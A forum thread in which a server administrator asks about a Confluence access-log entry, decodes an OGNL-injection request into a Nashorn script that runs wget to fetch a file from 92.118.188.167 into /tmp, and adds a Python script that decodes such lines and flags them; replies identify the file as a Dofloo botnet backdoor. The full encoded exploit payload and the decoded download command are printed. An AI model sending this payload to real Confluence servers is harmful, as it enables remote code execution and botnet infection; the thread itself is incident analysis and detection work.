Can anyone tell me what this site is? It keeps attacking my server

heyjei · 2022-07-02 23:06:41 +08:00 · 1339 views

    The site ( http://101.43.177.155/ ) turned up in Confluence's access log:

    [30/Jun/2022:00:00:03 +0800] - http-nio-6090-exec-400 101.43.177.155 GET //%24%7BClass.forName%28%22com%22%2B%22.opensymphony%22%2B%22.webwork%22%2B%22.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22CmdResponse%22%2CClass.forName%28%22javax%22%2B%22.script%22%2B%22.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22eval%28String.fromCharCode%28118%2C97%2C114%2C32%2C115%2C61%2C39%2C39%2C59%2C118%2C97%2C114%2C32%2C112%2C112%2C32%2C61%2C32%2C106%2C97%2C118%2C97%2C46%2C108%2C97%2C110%2C103%2C46%2C82%2C117%2C110%2C116%2C105%2C109%2C101%2C46%2C103%2C101%2C116%2C82%2C117%2C110%2C116%2C105%2C109%2C101%2C40%2C41%2C46%2C101%2C120%2C101%2C99%2C40%2C39%2C119%2C103%2C101%2C116%2C32%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C57%2C50%2C46%2C49%2C49%2C56%2C46%2C49%2C56%2C56%2C46%2C49%2C54%2C55%2C58%2C53%2C55%2C56%2C57%2C47%2C104%2C97%2C111%2C32%2C45%2C80%2C32%2C47%2C116%2C109%2C112%2C47%2C39%2C41%2C46%2C103%2C101%2C116%2C73%2C110%2C112%2C117%2C116%2C83%2C116%2C114%2C101%2C97%2C109%2C40%2C41%2C59%2C119%2C104%2C105%2C108%2C101%2C32%2C40%2C49%2C41%2C32%2C123%2C118%2C97%2C114%2C32%2C98%2C32%2C61%2C32%2C112%2C112%2C46%2C114%2C101%2C97%2C100%2C40%2C41%2C59%2C105%2C102%2C32%2C40%2C98%2C32%2C61%2C61%2C32%2C45%2C49%2C41%2C32%2C123%2C98%2C114%2C101%2C97%2C107%2C59%2C125%2C115%2C61%2C115%2C43%2C83%2C116%2C114%2C105%2C110%2C103%2C46%2C102%2C114%2C111%2C109%2C67%2C104%2C97%2C114%2C67%2C111%2C100%2C101%2C40%2C98%2C41%2C125%2C59%2C106%2C97%2C118%2C97%2C46%2C117%2C116%2C105%2C108%2C46%2C66%2C97%2C115%2C101%2C54%2C52%2C46%2C103%2C101%2C116%2C85%2C114%2C108%2C69%2C110%2C99%2C111%2C100%2C101%2C114%2C40%2C41%2C46%2C101%2C110%2C99%2C111%2C100%2C101%2C84%2C111%2C83%2C116%2C114%2C105%2C110%2C103%2C40%2C115%2C46%2C103%2C101%2C116%2C66%2C121%2C116%2C101%2C115%2C40%2C41%2C41%29%29%22%29%29%7D/ HTTP/1.0 302 7042ms - - python-requests/2.28.0

    After URL-decoding it reads: [30/Jun/2022:00:00:03 +0800] - http-nio-6090-exec-400 101.43.177.155 GET //${Class.forName("com"+".opensymphony"+".webwork"+".ServletActionContext").getMethod("getResponse",null).invoke(null,null).setHeader("CmdResponse",Class.forName("javax"+".script"+".ScriptEngineManager").newInstance().getEngineByName("nashorn").eval("eval(String.fromCharCode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}/ HTTP/1.0 302 7042ms - - python-requests/2.28.0

    After resolving the String.fromCharCode list it becomes: "var s='';var pp = java.lang.Runtime.getRuntime().exec('wget http://92.118.188.167:5789/hao -P /tmp/').getInputStream();while (1) {var b = pp.read();if (b == -1) {break;}s=s+String.fromCharCode(b)};java.util.Base64.getUrlEncoder().encodeToString(s.getBytes())"

    That is where my analysis runs out. Does anyone have an idea what it is doing?
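    The three decoding steps worked through in the post (percent-decode the request path, recover the String.fromCharCode list, then read the Runtime.exec argument out of the resulting Nashorn script) as one Python script. This is an added example, not code from the original post or from Confluence: SAMPLE_LOG is the log line quoted above, the BENIGN_LOGS lines are constructed here for the detector to ignore, and the regex and function names are my own. It goes one step beyond the post in that analyze() flags any line whose fully URL-decoded request path contains the ${ expression delimiter, which is how this payload reached the server, rather than only decoding this one line.

```python
"""Decode the Confluence access-log payload from the post and flag similar lines.

Added example, not code from the original post. SAMPLE_LOG is the log line
quoted in the post; BENIGN_LOGS are constructed lines in the same format.
Nothing here contacts the network: the stage-2 URL is only extracted, never fetched.
"""
import re
from urllib.parse import unquote

# The log line from the post, embedded verbatim so the script runs offline.
SAMPLE_LOG = (
    '[30/Jun/2022:00:00:03 +0800] - http-nio-6090-exec-400 101.43.177.155 GET '
    '//%24%7BClass.forName%28%22com%22%2B%22.opensymphony%22%2B%22.webwork%22%2B%22.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22CmdResponse%22%2CClass.forName%28%22javax%22%2B%22.script%22%2B%22.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22eval%28String.fromCharCode%28118%2C97%2C114%2C32%2C115%2C61%2C39%2C39%2C59%2C118%2C97%2C114%2C32%2C112%2C112%2C32%2C61%2C32%2C106%2C97%2C118%2C97%2C46%2C108%2C97%2C110%2C103%2C46%2C82%2C117%2C110%2C116%2C105%2C109%2C101%2C46%2C103%2C101%2C116%2C82%2C117%2C110%2C116%2C105%2C109%2C101%2C40%2C41%2C46%2C101%2C120%2C101%2C99%2C40%2C39%2C119%2C103%2C101%2C116%2C32%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C57%2C50%2C46%2C49%2C49%2C56%2C46%2C49%2C56%2C56%2C46%2C49%2C54%2C55%2C58%2C53%2C55%2C56%2C57%2C47%2C104%2C97%2C111%2C32%2C45%2C80%2C32%2C47%2C116%2C109%2C112%2C47%2C39%2C41%2C46%2C103%2C101%2C116%2C73%2C110%2C112%2C117%2C116%2C83%2C116%2C114%2C101%2C97%2C109%2C40%2C41%2C59%2C119%2C104%2C105%2C108%2C101%2C32%2C40%2C49%2C41%2C32%2C123%2C118%2C97%2C114%2C32%2C98%2C32%2C61%2C32%2C112%2C112%2C46%2C114%2C101%2C97%2C100%2C40%2C41%2C59%2C105%2C102%2C32%2C40%2C98%2C32%2C61%2C61%2C32%2C45%2C49%2C41%2C32%2C123%2C98%2C114%2C101%2C97%2C107%2C59%2C125%2C115%2C61%2C115%2C43%2C83%2C116%2C114%2C105%2C110%2C103%2C46%2C102%2C114%2C111%2C109%2C67%2C104%2C97%2C114%2C67%2C111%2C100%2C101%2C40%2C98%2C41%2C125%2C59%2C106%2C97%2C118%2C97%2C46%2C117%2C116%2C105%2C108%2C46%2C66%2C97%2C115%2C101%2C54%2C52%2C46%2C103%2C101%2C116%2C85%2C114%2C108%2C69%2C110%2C99%2C111%2C100%2C101%2C114%2C40%2C41%2C46%2C101%2C110%2C99%2C111%2C100%2C101%2C84%2C111%2C83%2C116%2C114%2C105%2C110%2C103%2C40%2C115%2C46%2C103%2C101%2C116%2C66%2C121%2C116%2C101%2C115%2C40%2C41%2C41%29%29%22%29%29%7D/'
    ' HTTP/1.0 302 7042ms - - python-requests/2.28.0'
)

# Constructed benign lines in the same log format; neither carries an expression.
BENIGN_LOGS = [
    '[30/Jun/2022:00:00:05 +0800] - http-nio-6090-exec-12 10.0.0.7 GET /login.action HTTP/1.1 200 15ms - - Mozilla/5.0',
    '[30/Jun/2022:00:00:09 +0800] - http-nio-6090-exec-13 10.0.0.8 GET /rest/api/content?title=Q%26A%20notes HTTP/1.1 200 30ms alice - curl/7.81.0',
]

# Tomcat-style request line: "<client-ip> <METHOD> <path> HTTP/x.y".
REQUEST_RE = re.compile(r'(\S+)\s+(GET|POST|PUT|PATCH|DELETE|HEAD|OPTIONS)\s+(\S+)\s+HTTP/\d\.\d')
# Outer layer: the numeric list handed to String.fromCharCode inside eval().
CHARCODE_RE = re.compile(r'String\.fromCharCode\(([\d,\s]+)\)')
# Inner layer: the argument of Runtime.exec('...') in the Nashorn script.
EXEC_RE = re.compile(r"exec\('([^']*)'\)")
URL_RE = re.compile(r'https?://[^\s\'"]+')


def fully_url_decode(path, max_rounds=3):
    """Percent-decode until the text stops changing, so double-encoded paths are caught too."""
    for _ in range(max_rounds):
        decoded = unquote(path)          # unquote, not unquote_plus: keep the %2B-encoded '+' operators
        if decoded == path:
            break
        path = decoded
    return path


def decode_charcodes(text):
    """Turn the first String.fromCharCode(118,97,...) list in text back into a string."""
    m = CHARCODE_RE.search(text)
    if not m:
        return ''
    codes = [int(n) for n in re.split(r'[,\s]+', m.group(1)) if n]
    return ''.join(chr(c) for c in codes)


def analyze(line):
    """Return a dict describing the injected payload, or None if the line looks clean."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    client_ip, method, path = m.groups()
    decoded_path = fully_url_decode(path)
    if '${' not in decoded_path:         # expression delimiter inside the URL path
        return None
    inner = decode_charcodes(decoded_path)
    cmd = EXEC_RE.search(inner)
    return {
        'client_ip': client_ip,
        'method': method,
        'decoded_path': decoded_path,
        'inner_script': inner,
        'command': cmd.group(1) if cmd else None,
        'download_urls': URL_RE.findall(inner),
    }


def scan(lines):
    """Run analyze() over an iterable of log lines and keep only the hits."""
    return [hit for hit in (analyze(line) for line in lines) if hit]


if __name__ == '__main__':
    for hit in scan([SAMPLE_LOG] + BENIGN_LOGS):
        print(f"{hit['client_ip']} {hit['method']} -> exec: {hit['command']}")
        for url in hit['download_urls']:
            print('  stage-2 download:', url)
        print('  decoded script:', hit['inner_script'])
```

    Run it as is and the one hit is 101.43.177.155 running wget http://92.118.188.167:5789/hao -P /tmp/ on the Confluence host; the script captures wget's output and, as the outer expression shows, sends it back Base64-encoded in a response header named CmdResponse, so the attacker sees whether the drop succeeded. Feed scan() your whole access log (or a grep for %24%7B) to find every request that used the same entry point, and keep the constructed benign lines in mind when tuning the '${' check: it is deliberately crude and meant as a triage filter, not a signature.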

    3 replies    2022-07-05 14:01:14 +08:00
    1  Tukali  2022-07-03 11:05:45 +08:00
    wget http://92.118.188.167:5789/hao
    The sample that does the dirty work is handed to you right there, isn't it? Download it and analyse what the file does.
    2  heyjei (OP)  2022-07-03 11:34:37 +08:00
    @Tukali It's a binary, I can't make sense of it. Sigh.
    3  eviladan0s  2022-07-05 14:01:14 +08:00   ❤️ 1
    A backdoor from the Dofloo botnet.